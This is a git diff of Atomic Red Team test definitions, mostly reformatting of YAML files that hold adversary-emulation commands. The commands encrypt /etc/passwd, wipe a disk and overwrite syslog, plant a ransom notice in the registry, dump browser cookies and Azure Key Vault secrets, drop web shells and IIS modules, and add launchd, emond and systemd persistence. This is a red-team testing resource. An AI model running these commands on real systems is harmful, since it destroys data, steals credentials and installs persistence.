https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -72,7 +72,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -88,7 +88,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Trusts auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -96,7 +96,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -144,11 +144,11 @@ atomic_tests: input_arguments: trufflesnout_path: description: Path to the TruffleSnout executable - type: Path + type: path default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe domain: description: Domain name to search on - type: String + type: string default: '%userdomain%' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1484.002/T1484.002.yaml b/atomics/T1484.002/T1484.002.yaml index b42136a7..9b595ee8 100644 --- a/atomics/T1484.002/T1484.002.yaml +++ b/atomics/T1484.002/T1484.002.yaml @@ -14,15 +14,15 @@ atomic_tests: input_arguments: azure_username: description: Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles - type: String + type: string default: bruce.wayne@contosocloud.com azure_password: description: Password of azure_username - type: String + type: string default: iamthebatman domain_name: description: Malicious federated domain name - type: String + type: string default: contoso.com dependency_executor_name: powershell dependencies: @@ -60,7 +60,7 @@ atomic_tests: Write-Host "Error: domain ""#{domain_name}"" not verified" exit 1 } - + if ($domain.AuthenticationType -eq "Federated") { Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before." exit 1 @@ -93,5 +93,3 @@ atomic_tests: Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore } catch {} name: powershell - - diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 1bdf710b..39b83d83 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: sdelete_exe: description: Path of sdelete executable - type: Path + type: path default: $env:TEMP\Sdelete\sdelete.exe file_to_delete: description: Path of file to delete - type: Path + type: path default: $env:TEMP\T1485.txt dependency_executor_name: powershell dependencies: @@ -43,11 +43,11 @@ atomic_tests: input_arguments: overwrite_source: description: Path of data source to overwrite with - type: Path + type: path default: /dev/zero file_to_overwrite: description: Path of file to overwrite and remove - type: Path + type: path default: /var/log/syslog executor: command: | @@ -61,8 +61,8 @@ atomic_tests: https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4 supported_platforms: - - windows - executor: + - windows + executor: command: | cipher.exe /w:C: name: command_prompt diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 411fefe8..1c4c5361 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -7,32 +7,32 @@ atomic_tests: description: | Uses gpg to encrypt a file supported_platforms: - - linux + - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file - type: String + type: string default: passwd encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.gpg input_file_path: description: path to the file that you want to encrypt - type: Path + type: path default: /etc/passwd encryption_alg: description: encryption algorithm of the file - type: String + type: string default: AES-256 dependency_executor_name: bash dependencies: - - description: | - Finds where gpg is located - prereq_command: | - which_gpg=`which gpg` - get_prereq_command: | - (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg) + - description: | + Finds where gpg is located + prereq_command: | + which_gpg=`which gpg` + get_prereq_command: | + (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg) executor: name: bash elevation_required: false @@ -47,27 +47,27 @@ atomic_tests: description: | Uses 7z to encrypt a file supported_platforms: - - linux + - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file - type: String + type: string default: passwd encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt - type: Path + type: path default: /etc/passwd dependency_executor_name: bash dependencies: - - description: | - Finds where 7z is located - prereq_command: | - which_7z=`which 7z` - get_prereq_command: | + - description: | + Finds where 7z is located + prereq_command: | + which_7z=`which 7z` + get_prereq_command: | executor: name: bash elevation_required: false @@ -81,36 +81,37 @@ atomic_tests: - name: Encrypt files using ccrypt (Linux) auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f description: | - Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. + Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. supported_platforms: - - linux + - linux input_arguments: cped_file_path: description: path where you want your copied file to be - type: Path + type: path default: /tmp/passwd root_input_file_path: - description: path to the file that you want to be encrypted if you are root user - type: Path + description: path to the file that you want to be encrypted if you are root + user + type: path default: /etc/passwd user_input_file_path: description: path to file that you want to be encrypted if you are normal user - type: Path + type: path default: ~/.bash_history impact_command: description: command to show impact of encryption - type: String + type: string default: sudo su dependency_executor_name: bash dependencies: - - description: | - Finds where ccencrypt and ccdecrypt is located and copies input file - prereq_command: | - which_ccencrypt=`which ccencrypt` - which_ccdecrypt=`which ccdecrypt` - if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi - get_prereq_command: | - (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt) + - description: | + Finds where ccencrypt and ccdecrypt is located and copies input file + prereq_command: | + which_ccencrypt=`which ccencrypt` + which_ccdecrypt=`which ccdecrypt` + if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi + get_prereq_command: | + (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt) executor: name: bash elevation_required: false @@ -125,35 +126,35 @@ atomic_tests: description: | Uses openssl to encrypt a file supported_platforms: - - linux + - linux input_arguments: private_key_path: description: path to the private key - type: Path + type: path default: /tmp/key.pem public_key_path: description: path to the public key - type: Path + type: path default: /tmp/pub.pem encryption_bit_size: description: size of the bit of encryption - type: Integer + type: integer default: 2048 encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt - type: Path - default: /etc/passwd + type: path + default: /etc/passwd dependency_executor_name: bash dependencies: - - description: | - Finds where openssl is located - prereq_command: | - which_openssl=`which openssl` - get_prereq_command: | + - description: | + Finds where openssl is located + prereq_command: | + which_openssl=`which openssl` + get_prereq_command: | executor: name: bash elevation_required: false @@ -172,12 +173,12 @@ atomic_tests: https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ supported_platforms: - - windows + - windows executor: name: command_prompt - elevation_required: true - command: | + elevation_required: true + command: | echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - cleanup_command: | + cleanup_command: | del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 diff --git a/atomics/T1489/T1489.yaml b/atomics/T1489/T1489.yaml index de12c4b8..652ffffc 100644 --- a/atomics/T1489/T1489.yaml +++ b/atomics/T1489/T1489.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: service_name: description: Name of a service to stop - type: String + type: string default: spooler executor: command: | @@ -32,7 +32,7 @@ atomic_tests: input_arguments: service_name: description: Name of a service to stop - type: String + type: string default: spooler executor: command: | @@ -53,10 +53,9 @@ atomic_tests: input_arguments: process_name: description: Name of a process to kill - type: String + type: string default: spoolsv.exe executor: command: | taskkill.exe /f /im #{process_name} name: command_prompt - diff --git a/atomics/T1491.001/T1491.001.yaml b/atomics/T1491.001/T1491.001.yaml index 8760ca99..d1f1d253 100644 --- a/atomics/T1491.001/T1491.001.yaml +++ b/atomics/T1491.001/T1491.001.yaml @@ -10,78 +10,78 @@ atomic_tests: input_arguments: url_of_wallpaper: description: URL pointing to the image file you wish to set as wallpaper - type: Url + type: url default: https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png pointer_to_orginal_wallpaper: description: Full path to where a file containing the original wallpaper location will be saved - type: String + type: string default: $env:TEMP\T1491.001-OrginalWallpaperLocation wallpaper_location: description: Full path to where the downloaded wallpaper image will be saved - type: String + type: string default: $env:TEMP\T1491.001-newWallpaper.png executor: command: | - $url = "#{url_of_wallpaper}" - $imgLocation = "#{wallpaper_location}" - $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper - $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}" - $updateWallpapercode = @' - using System.Runtime.InteropServices; - namespace Win32{ - - public class Wallpaper{ - [DllImport("user32.dll", CharSet=CharSet.Auto)] - static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; - - public static void SetWallpaper(string thePath){ - SystemParametersInfo(20,0,thePath,3); - } - } - } - '@ - $wc = New-Object System.Net.WebClient - try{ - $wc.DownloadFile($url, $imgLocation) - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($imgLocation) - } - catch [System.Net.WebException]{ - Write-Host("Cannot download $url") - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($imgLocation) - } - finally{ - $wc.Dispose() - } + $url = "#{url_of_wallpaper}" + $imgLocation = "#{wallpaper_location}" + $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper + $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}" + $updateWallpapercode = @' + using System.Runtime.InteropServices; + namespace Win32{ + + public class Wallpaper{ + [DllImport("user32.dll", CharSet=CharSet.Auto)] + static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; + + public static void SetWallpaper(string thePath){ + SystemParametersInfo(20,0,thePath,3); + } + } + } + '@ + $wc = New-Object System.Net.WebClient + try{ + $wc.DownloadFile($url, $imgLocation) + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($imgLocation) + } + catch [System.Net.WebException]{ + Write-Host("Cannot download $url") + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($imgLocation) + } + finally{ + $wc.Dispose() + } cleanup_command: | - $updateWallpapercode = @' - using System.Runtime.InteropServices; - namespace Win32{ - - public class Wallpaper{ - [DllImport("user32.dll", CharSet=CharSet.Auto)] - static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; - - public static void SetWallpaper(string thePath){ - SystemParametersInfo(20,0,thePath,3); - } - } - } - '@ - if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) { - $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}" - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($orgImg) - } - Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore - Remove-Item "#{wallpaper_location}" -ErrorAction Ignore + $updateWallpapercode = @' + using System.Runtime.InteropServices; + namespace Win32{ + + public class Wallpaper{ + [DllImport("user32.dll", CharSet=CharSet.Auto)] + static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; + + public static void SetWallpaper(string thePath){ + SystemParametersInfo(20,0,thePath,3); + } + } + } + '@ + if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) { + $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}" + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($orgImg) + } + Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore + Remove-Item "#{wallpaper_location}" -ErrorAction Ignore name: powershell - name: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b description: | Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText. - + [SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection), [Grief Ransomware](https://redcanary.com/blog/grief-ransomware/), [Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27), @@ -95,12 +95,12 @@ atomic_tests: input_arguments: legal_notice_caption: description: Title of ransom message - type: String + type: string default: PYSA legal_notice_text: description: Body of ransom message - type: String - default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org" + type: string + default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org" executor: command: |- $orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption diff --git a/atomics/T1505.002/T1505.002.yaml b/atomics/T1505.002/T1505.002.yaml index a831ec5d..a2ccdea4 100644 --- a/atomics/T1505.002/T1505.002.yaml +++ b/atomics/T1505.002/T1505.002.yaml @@ -11,15 +11,15 @@ atomic_tests: input_arguments: class_factory: description: Class factory of transport agent. - type: String + type: string default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory dll_path: description: Path of DLL to use as transport agent. - type: Path + type: path default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll transport_agent_identity: description: Friendly name of transport agent once installed. - type: String + type: string default: Security Interop Agent dependencies: - description: | diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml index 12effc47..fa527c58 100644 --- a/atomics/T1505.003/T1505.003.yaml +++ b/atomics/T1505.003/T1505.003.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: web_shell_path: description: The path to drop the web shell - type: String + type: string default: C:\inetpub\wwwroot web_shells: description: Path of Web Shell - type: Path + type: path default: PathToAtomicsFolder\T1505.003\src dependency_executor_name: powershell dependencies: diff --git a/atomics/T1505.004/T1505.004.yaml b/atomics/T1505.004/T1505.004.yaml index a0ac74a4..ccf81f78 100644 --- a/atomics/T1505.004/T1505.004.yaml +++ b/atomics/T1505.004/T1505.004.yaml @@ -14,13 +14,13 @@ atomic_tests: input_arguments: module_name: description: The name of the IIS module - type: String + type: string default: DefaultDocumentModule_Atomic dll_path: description: The path to the DLL to be loaded type: path default: '%windir%\system32\inetsrv\defdoc.dll' - dependency_executor_name: powershell + dependency_executor_name: powershell dependencies: - description: | IIS must be installed in order to add a module to IIS. @@ -48,13 +48,13 @@ atomic_tests: input_arguments: module_name: description: The name of the IIS module - type: String + type: string default: DefaultDocumentModule_Atomic dll_path: description: The path to the DLL to be loaded type: path default: '%windir%\system32\inetsrv\defdoc.dll' - dependency_executor_name: powershell + dependency_executor_name: powershell dependencies: - description: | IIS must be installed in order to add a module to IIS. @@ -68,4 +68,4 @@ atomic_tests: New-WebGlobalModule -Name #{module_name} -Image #{dll_path} cleanup_command: | Remove-WebGlobalModule -Name #{module_name} - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1526/T1526.yaml b/atomics/T1526/T1526.yaml index 8511f692..a206fbd6 100644 --- a/atomics/T1526/T1526.yaml +++ b/atomics/T1526/T1526.yaml @@ -12,20 +12,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az output_directory: description: Directory to output results to - type: String - default: $env:temp\T1526Test1 + type: string + default: $env:temp\T1526Test1 subscription_name: description: Azure subscription name to scan - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1528/T1528.yaml b/atomics/T1528/T1528.yaml index c3d0c5c1..03d8e771 100644 --- a/atomics/T1528/T1528.yaml +++ b/atomics/T1528/T1528.yaml @@ -4,27 +4,27 @@ atomic_tests: - name: Azure - Dump All Azure Key Vaults with Microburst auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea description: |- - Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. - See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/ + Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. + See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/ supported_platforms: - iaas:azure input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az output_file: description: File to dump results to - type: String + type: string default: $env:temp\T1528Test1.txt subscription_id: description: Azure subscription id to search - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index 34927fa8..4bde7a34 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: timeout: description: Timeout period before shutdown (seconds) - type: Integer + type: integer default: 1 executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: timeout: description: Timeout period before restart (seconds) - type: Integer + type: integer default: 1 executor: command: | @@ -43,7 +43,7 @@ atomic_tests: input_arguments: timeout: description: Time to restart (can be minutes or specific time) - type: String + type: string default: now executor: command: | @@ -60,7 +60,7 @@ atomic_tests: input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) - type: String + type: string default: now executor: command: | diff --git a/atomics/T1530/T1530.yaml b/atomics/T1530/T1530.yaml index 936e55bd..9c3e1c84 100644 --- a/atomics/T1530/T1530.yaml +++ b/atomics/T1530/T1530.yaml @@ -11,16 +11,16 @@ atomic_tests: input_arguments: base: description: Azure blob keyword to enumerate (Example, storage account name) - type: String + type: string default: secure output_file: description: File to output results to - type: String + type: string default: $env:temp\T1530Test1.txt wordlist: - description: File path to keywords for search permutations - type: String - default: $env:temp\permutations.txt + description: File path to keywords for search permutations + type: string + default: $env:temp\permutations.txt dependency_executor_name: powershell dependencies: - description: | @@ -53,19 +53,19 @@ atomic_tests: input_arguments: base_name: description: Azure storage account name to test - type: String + type: string default: T1530Test2 output_file: description: File to output results to - type: String + type: string default: $env:temp\T1530Test2.txt container_name: description: Container name to search for (optional) - type: String + type: string default: blob_name: description: Blob name to search for (optional) - type: String + type: string default: executor: command: | @@ -81,7 +81,7 @@ atomic_tests: cleanup_command: | remove-item #{output_file} -erroraction silentlycontinue name: powershell -- name: AWS - Scan for Anonymous Access to S3 +- name: AWS - Scan for Anonymous Access to S3 auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5 description: | Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder. @@ -90,24 +90,24 @@ atomic_tests: input_arguments: s3_bucket_name: description: Name of the bucket - type: String + type: string default: "redatomic-test2" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - aws s3api create-bucket --bucket #{s3_bucket_name} - aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json - touch /tmp/T1530.txt - aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} - get_prereq_command: | - echo Please install the aws-cli and configure your AWS default profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} + aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json + touch /tmp/T1530.txt + aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} + get_prereq_command: | + echo Please install the aws-cli and configure your AWS default profile using: aws configure executor: command: | - aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} + aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} cleanup_command: | - aws s3 rb s3://#{s3_bucket_name} --force - rm -rf /tmp/#{s3_bucket_name} + aws s3 rb s3://#{s3_bucket_name} --force + rm -rf /tmp/#{s3_bucket_name} name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1531/T1531.yaml b/atomics/T1531/T1531.yaml index 99b568e0..8b87251d 100644 --- a/atomics/T1531/T1531.yaml +++ b/atomics/T1531/T1531.yaml @@ -11,15 +11,15 @@ atomic_tests: input_arguments: user_account: description: User account whose password will be changed. - type: String + type: string default: AtomicAdministrator new_user_password: description: Password to use if user account must be created first - type: String + type: string default: User2ChangePW! new_password: description: New password for the specified account. - type: String + type: string default: HuHuHUHoHo283283@dJD executor: command: | @@ -38,11 +38,11 @@ atomic_tests: input_arguments: new_user_password: description: Password to use if user account must be created first - type: String + type: string default: User2DeletePW! user_account: description: User account to be deleted. - type: String + type: string default: AtomicUser executor: command: | @@ -67,15 +67,15 @@ atomic_tests: input_arguments: super_user: description: Account used to run the execution command (must include domain). - type: String + type: string default: 'domain\super_user' super_pass: description: super_user account password. - type: String + type: string default: "password" remove_user: description: Account to remove from domain admins. - type: String + type: string default: "remove_user" executor: command: | diff --git a/atomics/T1539/T1539.yaml b/atomics/T1539/T1539.yaml index ce85d10d..9215dbe7 100644 --- a/atomics/T1539/T1539.yaml +++ b/atomics/T1539/T1539.yaml @@ -1,5 +1,5 @@ attack_technique: T1539 -display_name: Steal Web Session Cookie +display_name: Steal Web Session Cookie atomic_tests: - name: Steal Firefox Cookies (Windows) auto_generated_guid: 4b437357-f4e9-4c84-9fa6-9bcee6f826aa @@ -12,11 +12,11 @@ atomic_tests: input_arguments: sqlite3_path: description: Path to sqlite3 - type: Path + type: path default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies - type: Path + type: path default: $env:temp\T1539FirefoxCookies.txt dependency_executor_name: powershell dependencies: @@ -29,11 +29,11 @@ atomic_tests: Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force executor: command: | - stop-process -name "firefox" -force -erroraction silentlycontinue - $CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite" - "select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}" - cleanup_command: | - remove-item #{output_file} -erroraction silentlycontinue + stop-process -name "firefox" -force -erroraction silentlycontinue + $CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite" + "select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}" + cleanup_command: | + remove-item #{output_file} -erroraction silentlycontinue name: powershell elevation_required: false - name: Steal Chrome Cookies (Windows) @@ -48,15 +48,15 @@ atomic_tests: input_arguments: cookie_db: description: Filepath for Chrome cookies database - type: String + type: string default: $env:localappdata\Google\Chrome\User Data\Default\Network\Cookies sqlite3_path: description: Path to sqlite3 - type: Path + type: path default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies - type: Path + type: path default: $env:temp\T1539ChromeCookies.txt dependency_executor_name: powershell dependencies: @@ -69,9 +69,9 @@ atomic_tests: Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force executor: command: | - stop-process -name "chrome" -force -erroraction silentlycontinue - "select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}" - cleanup_command: | - remove-item #{output_file} + stop-process -name "chrome" -force -erroraction silentlycontinue + "select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}" + cleanup_command: | + remove-item #{output_file} name: powershell elevation_required: false diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml index 128f26fc..3ada90e1 100644 --- a/atomics/T1543.001/T1543.001.yaml +++ b/atomics/T1543.001/T1543.001.yaml @@ -9,12 +9,12 @@ atomic_tests: - macos input_arguments: plist_filename: - description: filename - type: String + description: filename + type: string default: com.atomicredteam.plist path_malicious_plist: description: Name of file to store in cron folder - type: String + type: string default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist dependency_executor_name: bash dependencies: @@ -40,19 +40,19 @@ atomic_tests: This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. supported_platforms: - - macos + - macos input_arguments: script_location: description: evil plist location - type: Path + type: path default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist script_destination: description: Path where to move the evil plist - type: Path + type: path default: /etc/emond.d/rules/atomicredteam_T1053_004.plist empty_file: description: Random name of the empty file used to trigger emond service - type: String + type: string default: randomflag executor: name: bash @@ -60,6 +60,6 @@ atomic_tests: command: | sudo cp #{script_location} #{script_destination} sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | + cleanup_command: |- sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} \ No newline at end of file + sudo rm /private/var/db/emondClients/#{empty_file} diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index 393c59b4..d97d5703 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -10,35 +10,35 @@ atomic_tests: input_arguments: systemd_service_path: description: Path to systemd service unit file - type: Path + type: path default: /etc/systemd/system systemd_service_file: description: File name of systemd service unit file - type: String + type: string default: art-systemd-service.service execstoppost_action: description: ExecStopPost action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execstoppost-marker execreload_action: description: ExecReload action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execreload-marker execstart_action: description: ExecStart action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execstart-marker execstop_action: description: ExecStop action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execstop-marker execstartpre_action: description: ExecStartPre action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execstartpre-marker execstartpost_action: description: ExecStartPost action for Systemd service - type: String + type: string default: /bin/touch /tmp/art-systemd-execstartpost-marker executor: command: | @@ -73,14 +73,14 @@ atomic_tests: This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. supported_platforms: - - linux + - linux dependencies: - - description: | - System must be Ubuntu ,Kali OR CentOS. - prereq_command: | - if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; - get_prereq_command: | - echo Please run from Ubuntu ,Kali OR CentOS. + - description: | + System must be Ubuntu ,Kali OR CentOS. + prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; + get_prereq_command: | + echo Please run from Ubuntu ,Kali OR CentOS. executor: name: bash elevation_required: true @@ -111,4 +111,3 @@ atomic_tests: systemctl disable T1543.002 rm -rf /etc/init.d/T1543.002 systemctl daemon-reload - diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml index cd187437..cac19d47 100644 --- a/atomics/T1543.003/T1543.003.yaml +++ b/atomics/T1543.003/T1543.003.yaml @@ -9,7 +9,7 @@ atomic_tests: and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. supported_platforms: - - windows + - windows executor: name: command_prompt @@ -26,26 +26,26 @@ atomic_tests: Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. supported_platforms: - - windows + - windows input_arguments: binary_path: description: Name of the service binary, include path. - type: Path + type: path default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe service_name: description: Name of the Service - type: String + type: string default: AtomicTestService_CMD dependency_executor_name: powershell dependencies: - - description: | - Service binary must exist on disk at specified location (#{binary_path}) - prereq_command: | - if (Test-Path #{binary_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + - description: | + Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: | + if (Test-Path #{binary_path}) {exit 0} else {exit 1} + 